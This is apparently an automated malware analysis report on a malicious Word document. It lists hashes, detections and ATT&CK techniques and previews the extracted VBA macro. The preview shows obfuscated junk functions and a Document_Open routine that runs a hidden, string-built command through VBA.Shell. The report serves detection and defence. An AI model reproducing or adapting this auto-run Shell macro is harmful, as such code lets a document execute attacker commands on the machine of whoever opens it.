Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bca142b7c8343cb…

MALICIOUS

Office (OLE)

170.5 KB Created: 2018-07-23 13:37:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: bcda82eaabef24b6a797a78996fccbb5 SHA-1: f7253802d426940056ba1f08899cd23241145cee SHA-256: 5bca142b7c8343cbc243c7269aaa1d8dea67a5ceddb79b55b0c15cea462d1391
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro, and a critical heuristic firing for Shell() calls within the VBA code. This indicates the macro is designed to execute arbitrary commands. The ClamAV detection name 'Doc.Malware.Valyria-6989445-0' further confirms its malicious nature. The macro's intent is likely to download and execute a second-stage payload, a common technique for malware delivery.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6989445-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6989445-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25218 bytes
SHA-256: 036e8c13853aaeb244d069d2469e893be2ee1a95ebe67fa07a23d0df844c8a44
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hzqoUrQTfEOO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function rjDMdTWbjwIsI()
On Error Resume Next
   If PoXtj Xor zVwMz Then
      zTTfz = 134100329
   End If
   If djYPSS Xor aftIUZ Then
      zXJji = 134100329
   End If
   If SPczw Xor hWjlb Then
      OsXiT = 134100329
   End If
   If rKHzjz Xor IPRLV Then
      qbrYF = 134100329
   End If
   If lUbnsX Xor zvJwPW Then
      lVQQl = 134100329
   End If
End Function
Private Function ZDNfTBnRmYIi()
On Error Resume Next
   If qSQqjc Xor zpjSW Then
      SbFEV = 134100329
   End If
   If aNdMw Xor UphTmT Then
      YzvFXF = 134100329
   End If
   If GSdnq Xor JiOcfK Then
      qdszW = 134100329
   End If
   If iMDTLo Xor JzkEjV Then
      TvAZF = 134100329
   End If
   If QrWKSi Xor UtXGfj Then
      Itqcp = 134100329
   End If
End Function
Private Function ZNGSwzA()
On Error Resume Next
   If qukql Xor jlfvOK Then
      MzLGS = 134100329
   End If
   If aIUFM Xor EzqtN Then
      dOYXH = 134100329
   End If
   If OnwIb Xor wFJKB Then
      IbRGcH = 134100329
   End If
   If lCGcPM Xor fkwcc Then
      RnLXu = 134100329
   End If
   If ZSjdO Xor jwwhvo Then
      dqSdAs = 134100329
   End If
   If Nvopu Xor oMIvP Then
      FzvDT = 134100329
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If fAtJvq = PNFHCq Then
      VWXIAw = ITSti * 102768365
   End If
   If pMbksN = pjUwi Then
      Alajw = HorPAI * 102768365
   End If
   If zopTU = YcEDuu Then
      LYlwbo = lmwcL * 102768365
   End If
   If jwjjk = hiTPk Then
      Ajwjt = rTHjP * 102768365
   End If
VBA.Shell "" + hbQRFPaAiW + pjqCJRbMXsm + CVar("C") + drzwabQriIFDhd + kwJlESIBNrr + BonnVRGw + tWEtX + uZruUPj + dYNsMHc + fUTKiDjEVNPnr, 0
   If DNTYE = jVUhlJ Then
      bDdjj = SLZEMP * 102768365
   End If
   If udIGI = UmUUSz Then
      KmDpf = BTLbb * 102768365
   End If
   If uAAPml = pznEM Then
      wzwcst = dSkfE * 102768365
   End If
End Sub
Private Function BcPUKmRL()
On Error Resume Next
   If ZGthW = rFpzY Then
      WiAwY = XknzjA * 102768365
   End If
   If hvjUMf = KtVErO Then
      zhzAjB = mmSTKF * 102768365
   End If
   If kiiYqW = EOaWj Then
      GUOun = tNhFj * 102768365
   End If
   If uIQBC = dCfNFQ Then
      mQtQs = DPMmL * 102768365
   End If
   If NHwaN = jnhHj Then
      RaAGKN = VdoQc * 102768365
   End If
End Function
Private Function SanpbjzMTYiN()
On Error Resume Next
   If iWsCa = ZmaUAj Then
      GjWZu = cMlqiD * 102768365
   End If
   If KiscXq = HJujq Then
      mbXcJ = wwMAcT * 102768365
   End If
   If bbFpj = HYhzkv Then
      TiFrD = ukFqZ * 102768365
   End If
   If jwiQIp = wGYpz Then
      vHtWYQ = VnvHS * 102768365
   End If
   If LBlFjz = fhAEt Then
      aLQtJ = fMkwwZ * 102768365
   End If
End Function
Private Function QjDZuASz()
On Error Resume Next
   If ildsRJ = nfRmoR Then
      OnYUKo = okqQtj * 102768365
   End If
   If jDRoz = UqnQS Then
      QIPMol = WsQXvb * 102768365
   End If
   If PvuXPF = cFkiJ Then
      TzwXK = mijcT * 102768365
   End If
   If TPjVNd = vMjLhA Then
      QdFszv = hmoED * 102768365
   End If
   If ZdGElr = slGvnj Then
      KdjrX = uKiMh * 102768365
   End If
End Function


Attribute VB_Name = "RWkfRXKkffYmW"
Private Function nESfuLiw()
On Error Resume Next
   If cEJaZz = Wmdstw Then
      For vIhnTc = 155 To 516331127
         nAHOY = 21658 + uEDztO / (46281 * DsjdwS * 67395 * FuqfQ)
      Next
      Else
      TtHBr = (DCLAml / hasAkS)
   End If
   If qQHTPD = vkNlu Then
      For EjONfj = 155 To 516331127
         pfiAK = 38586 + CJEloB / (45648 * OAWOZL * 56615 * zwlzN)
      Next
      Else
      XVXKO = (KmHIvH / mjbws)
   End If
   If iMzCM = DHmMB Then
      For wjEqJ = 155 To 516331127
         SAqXC = 31756 + koKVD 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.